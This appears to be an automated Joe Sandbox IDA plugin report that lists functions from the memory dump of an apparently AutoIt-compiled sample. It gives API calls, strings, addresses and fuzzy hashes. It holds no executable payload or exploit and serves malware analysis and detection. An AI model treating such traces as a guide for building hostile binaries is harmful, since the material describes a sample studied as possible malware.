Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: HandleInitialize
String ID: <w,
API String ID: 3139323997-2157332020
Opcode ID: 828d7b4623c442a060db4bae0136028e5d5d6c9d39795d7985f4dc2510873234
Instruction ID: 2aede5a4ebc897f43dd78ff27626d93eaf9b234a680c1c4d0a37b189616bfd71
Opcode Fuzzy Hash: 828d7b4623c442a060db4bae0136028e5d5d6c9d39795d7985f4dc2510873234
Instruction Fuzzy Hash: 6C41C1B092C3858EC369DF6ABD4CE59BFF5EB6930075081AAD428C72B2E7340469CF55

Function 00201284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00201275,SwapMouseButtons,00000004,?), ref: 002012A8
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00201275,SwapMouseButtons,00000004,?), ref: 002012C9
RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00201275,SwapMouseButtons,00000004,?), ref: 002012EB

Strings

Control Panel\Mouse, xrefs: 002012A6

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 4671397100b4eb7fe6dc6a4d308137607be6869d18149ca3bcb41229fade1640
Instruction ID: 298dd53f4a456aa2b5fabf8ca832f0bf03702c8c40d5345d56bfcb2038b70717
Opcode Fuzzy Hash: 4671397100b4eb7fe6dc6a4d308137607be6869d18149ca3bcb41229fade1640
Instruction Fuzzy Hash: A2115A71920218BFDB218FA4DC84EAFBBBCEF04740F00456AF805D7150D3719E6097A0

Function 00220FE6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0022593C: __FF_MSGBANNER.LIBCMT ref: 00225953
Part of subcall function 0022593C: __NMSG_WRITE.LIBCMT ref: 0022595A
Part of subcall function 0022593C: RtlAllocateHeap.NTDLL(01510000,00000000,00000001,?,00000004,?,?,00221003,?), ref: 0022597F

std::exception::exception.LIBCMT ref: 0022101C
__CxxThrowException@8.LIBCMT ref: 00221031

Part of subcall function 002287CB: RaiseException.KERNEL32(?,?,?,002BCAF8,?,?,?,?,?,00221036,?,002BCAF8,?,00000001), ref: 00228820

Strings

h=), xrefs: 00221011
`=), xrefs: 00221029

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID: `=)$h=)
API String ID: 3902256705-589412542
Opcode ID: 7e053e6ac6c2d32cf7900338124b7fb2380504f24f0aa0353ef19b59ba5d241e
Instruction ID: dffbeef4908677d49ee736a74e82010b2a174b8e2b016f5bd257d2f7c57bca58
Opcode Fuzzy Hash: 7e053e6ac6c2d32cf7900338124b7fb2380504f24f0aa0353ef19b59ba5d241e
Instruction Fuzzy Hash: FDF0D13552422EB2CB20EAD8F8159DEB7ACAF01314F100025FD0492181DFB08BB0CAE0

Function 00215B29 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00215B58

Part of subcall function 002156F8: _memset.LIBCMT ref: 00215787
Part of subcall function 002156F8: _wcscpy.LIBCMT ref: 002157DB
Part of subcall function 002156F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002157EB

KillTimer.USER32(?,00000001,?,?), ref: 00215BAD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00215BBC
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00250D7C

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 697129c620e81694c62f61334b588ea33b7a75e54ccfe11b5a41837178010459
Instruction ID: 48291ae6f89ec1d19f12e2a3152ef4183408f2690fbb4637a449e96cb530548e
Opcode Fuzzy Hash: 697129c620e81694c62f61334b588ea33b7a75e54ccfe11b5a41837178010459
Instruction Fuzzy Hash: DF2128705197989FE7728B649CD9FEABBFCDF11308F00048DEA8956141C3742A98CB45

Function 0021278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 002149C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,002127AF,?,00000001), ref: 002149F4

_free.LIBCMT ref: 0024FB04
_free.LIBCMT ref: 0024FB4B

Part of subcall function 002129BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00212ADF

Strings

Bad directive syntax error, xrefs: 0024FB33

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: Bad directive syntax error
API String ID: 2861923089-2118420937
Opcode ID: 387303e89ea2a0b849780fe68068a2cf55fd557a8c620d5beb012a8576e784dc
Instruction ID: 00e71ce0541ce4a46fce12d4d9ff64a72cf0d53b69eb8245367253b755da4cad
Opcode Fuzzy Hash: 387303e89ea2a0b849780fe68068a2cf55fd557a8c620d5beb012a8576e784dc
Instruction Fuzzy Hash: F8919F71920229EFCF18EFA4C9919EEB7B4FF55314F10442AF816AB291DB309A65CF50

Function 002148B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 002148FA

Strings

AU3! ?), xrefs: 002148F4
EA06, xrefs: 002508A1

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: _memmove
String ID: AU3! ?)$EA06
API String ID: 4104443479-2976212232
Opcode ID: 2166de3bc4080ffec59f903ef93207518bef8580b63f3256defb83fc8b1a7280
Instruction ID: 123a68d4fb9f4f34e84e310a2da8458e06270a457087d97e0d3396cb2fd6f33e
Opcode Fuzzy Hash: 2166de3bc4080ffec59f903ef93207518bef8580b63f3256defb83fc8b1a7280
Instruction Fuzzy Hash: 7F417B21A241985BDF21AF548C95BFF7BE58F65310F284075EC8AAB282C6718DF487E1

Function 00269CF1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00214AB2: __fread_nolock.LIBCMT ref: 00214AD0

_wcscmp.LIBCMT ref: 00269DE1
_wcscmp.LIBCMT ref: 00269DF4

Strings

FILE, xrefs: 00269D2D

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: d913ce4dbb50c1ce8b1d4a83a53624ce325d8027c6975419f1080914f278bda8
Instruction ID: 7e0ea33cd4342cc5a1bb98bad4ceb97603c6c07158a0f22541d3b659b50f2813
Opcode Fuzzy Hash: d913ce4dbb50c1ce8b1d4a83a53624ce325d8027c6975419f1080914f278bda8
Instruction Fuzzy Hash: CB411871A1021ABADF20EFA4CC45FEFB7FDEF45710F00006AF904A7180DA7199948BA4

Function 002131BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0025032B
GetOpenFileNameW.COMDLG32(?), ref: 00250375

Part of subcall function 00220284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00212A58,?,00008000), ref: 002202A4

Part of subcall function 002209C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 002209E4

Strings

X, xrefs: 00250343

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 5ffe8b475ece7ebc50ce4ce3b3224ca947239ebe644f82487cbe3ee6cc7c5472
Instruction ID: a2e7ee3dc0d70e734c293b3e82b9f488aee86a891818d49d4e623e87cb27f057
Opcode Fuzzy Hash: 5ffe8b475ece7ebc50ce4ce3b3224ca947239ebe644f82487cbe3ee6cc7c5472
Instruction Fuzzy Hash: 1921D571A20298ABDF01DFD4D845BEE7BF89F49300F00405AE804A7241DBF59AADCFA1

Function 0027D1C6 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dc5270e80e6c7dc3eeb107fb96b043ee607a33a3a8368b0ccd6c9f2a65caf68
Instruction ID: 8ce56053c4f6f724220bca60bcacef9dc1352e1c4e10405489d94d2efcda466b
Opcode Fuzzy Hash: 8dc5270e80e6c7dc3eeb107fb96b043ee607a33a3a8368b0ccd6c9f2a65caf68
Instruction Fuzzy Hash: 5BF135B0A183019FC714DF28C484A6ABBF5FF88314F14892EF9999B252D770E955CF82

Function 00211680 Relevance: 4.7, APIs: 3, Instructions: 187COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 002116DB
_memmove.LIBCMT ref: 0021174C
_memmove.LIBCMT ref: 002117B9

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 6f1b5b310ba30a12bb29c7152fe2cf769aad959cf2aa2ffcaf3f5388811f0110
Instruction ID: 7bbaf5778e64262b922c61e589d39f6a126eba02faeead075374e03dd10a0f95
Opcode Fuzzy Hash: 6f1b5b310ba30a12bb29c7152fe2cf769aad959cf2aa2ffcaf3f5388811f0110
Instruction Fuzzy Hash: 9461AE71620209EBDF048F25E980AAABBF4FF54310F1581A9EC19CF295EB31D9B0CB51

Function 002159D3 Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002159F9
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00215A9E
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00215ABB

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 531d20d0e5938556207d31127155d9a5a339482f8de65b47c0528cb4dcdb5a24
Instruction ID: 79f88d9d5a6e94dbd02a14e39ec5ef68cf5071916b86b36872c7743f5689df67
Opcode Fuzzy Hash: 531d20d0e5938556207d31127155d9a5a339482f8de65b47c0528cb4dcdb5a24
Instruction Fuzzy Hash: C33161B0515B11CFD720DF24E884AD7BBE8FF98305F000A6EF99A86250E7756994CF92

Function 0022593C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00225953

Part of subcall function 0022A39B: __NMSG_WRITE.LIBCMT ref: 0022A3C2
Part of subcall function 0022A39B: __NMSG_WRITE.LIBCMT ref: 0022A3CC

__NMSG_WRITE.LIBCMT ref: 0022595A

Part of subcall function 0022A3F8: GetModuleFileNameW.KERNEL32(00000000,002C53BA,00000104,00000004,00000001,00221003), ref: 0022A48A
Part of subcall function 0022A3F8: ___crtMessageBoxW.LIBCMT ref: 0022A538

Part of subcall function 002232CF: ___crtCorExitProcess.LIBCMT ref: 002232D5
Part of subcall function 002232CF: ExitProcess.KERNEL32 ref: 002232DE

Part of subcall function 00228D58: __getptd_noexit.LIBCMT ref: 00228D58

RtlAllocateHeap.NTDLL(01510000,00000000,00000001,?,00000004,?,?,00221003,?), ref: 0022597F

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 6af0672d64dc2e90ea0027c9464de8f16368c3727ad131a03becb382f1a3690b
Instruction ID: db69b07dd65f1d6e4b74e26fff2a71726b8456fe6c7da739a648dad60dc2f8a4
Opcode Fuzzy Hash: 6af0672d64dc2e90ea0027c9464de8f16368c3727ad131a03becb382f1a3690b
Instruction Fuzzy Hash: 2501F531271B36FBE611AFF4BC42A6E32889F42770F504526F8189A1D1DEB4DDA04AE1

Function 002692C8 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 002692D6

Part of subcall function 00222F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00229C54,00000000,00228D5D,002259C3), ref: 00222F99
Part of subcall function 00222F85: GetLastError.KERNEL32(00000000,?,00229C54,00000000,00228D5D,002259C3), ref: 00222FAB

_free.LIBCMT ref: 002692E7
_free.LIBCMT ref: 002692F9

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
Instruction ID: c0c368a4c3ae1faceb81423f02d9f6a60573b0a0631273911acbad1026b12042
Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
Instruction Fuzzy Hash: 6CE0C2A1224613B3CA20A9B87A40E8377EC0FC8711764040EB809D3582CE30E8E48468

Function 00205E83 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 551COMMON

Download Yara Rule

Strings

CALL, xrefs: 0023E234

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 32ab998283e59f2a1e10f5b7fff33b15e5b80f59bd705c7e3059b632a033ea1e
Instruction ID: 7df77dbd5c937a4e8d2af841843a3f6d24c4c0087070d1c5f9b0748ef72cbe8f
Opcode Fuzzy Hash: 32ab998283e59f2a1e10f5b7fff33b15e5b80f59bd705c7e3059b632a033ea1e
Instruction Fuzzy Hash: EB325AB0528312DFDB24DF14C488A2AB7E1BF44304F15856DE88A9B3A2C771ED65CF82

Function 00266818 Relevance: 3.2, APIs: 2, Instructions: 216COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 002668EC
_memmove.LIBCMT ref: 0026690A

Part of subcall function 00266A73: _memmove.LIBCMT ref: 00266B01

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: cdc4ee5d02bcf24afdfa95328405049782ae6d8391ea2411472e0393a9e56d22
Instruction ID: 911f99480fc4b9e015b0c812fad87e1c7ac25f2e8993c37c59c2fac908ba0f13
Opcode Fuzzy Hash: cdc4ee5d02bcf24afdfa95328405049782ae6d8391ea2411472e0393a9e56d22
Instruction Fuzzy Hash: F771A2701206059FCB249F54D849BAABBA5EF45314F24C50DECD56B382CB75ADA1CF90

Function 00266135 Relevance: 3.1, APIs: 2, Instructions: 142COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0026614E

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: BuffCharLower
String ID:
API String ID: 2358735015-0
Opcode ID: 2e18d64c3751ce614fe8898aa8e870e2955f8d1e3553445b60a41922d499c8ef
Instruction ID: 15dcca9cd666461b84e43b12a69ed92da6ded4ccb5065796cbc6bfce69d19155
Opcode Fuzzy Hash: 2e18d64c3751ce614fe8898aa8e870e2955f8d1e3553445b60a41922d499c8ef
Instruction Fuzzy Hash: 4E41F5B6610209AFDB21DFA4C8958AEB7F8FF54350F10456EE91AC7241EB709EA0CB50

Function 00220E38 Relevance: 3.1, APIs: 2, Instructions: 94COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32 ref: 00220ED5
SetErrorMode.KERNEL32 ref: 00220EE7

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ChangeCloseErrorFindModeNotification
String ID:
API String ID: 1298299968-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 56a1166194c0007c4a560d58585ab7f32e2e3612aaca7a88777e5097a1eee684
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 28310A70A1011AEFC718DF88E4C0969F7A5FF59310F658A95E409CB662DB71EDD1CB80

Function 00215F8B Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00215FEF

Part of subcall function 0022359C: __lock.LIBCMT ref: 002235A2
Part of subcall function 0022359C: DecodePointer.KERNEL32(00000001,?,00216004,00258892), ref: 002235AE
Part of subcall function 0022359C: EncodePointer.KERNEL32(?,?,00216004,00258892), ref: 002235B9

Part of subcall function 00215F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00215F18
Part of subcall function 00215F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00215F2D

Part of subcall function 00215240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0021526C
Part of subcall function 00215240: IsDebuggerPresent.KERNEL32 ref: 0021527E
Part of subcall function 00215240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 002152E6
Part of subcall function 00215240: SetCurrentDirectoryW.KERNEL32(?), ref: 00215366

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0021602F

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 47a8e176b652217f788c7696e87300f3bc8ebc57bf0d8b1b20765bcefc487271
Instruction ID: 5c515c68293b931eef6565b1dde702c78bd668665535eb01881bec1a5014dd40
Opcode Fuzzy Hash: 47a8e176b652217f788c7696e87300f3bc8ebc57bf0d8b1b20765bcefc487271
Instruction Fuzzy Hash: 1C115C719283169BC710EF69EC4995AFBE8FF98710F00851EF444872A2DBB09694CF96

Function 0022581D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0022584C
__lock_file.LIBCMT ref: 0022586D

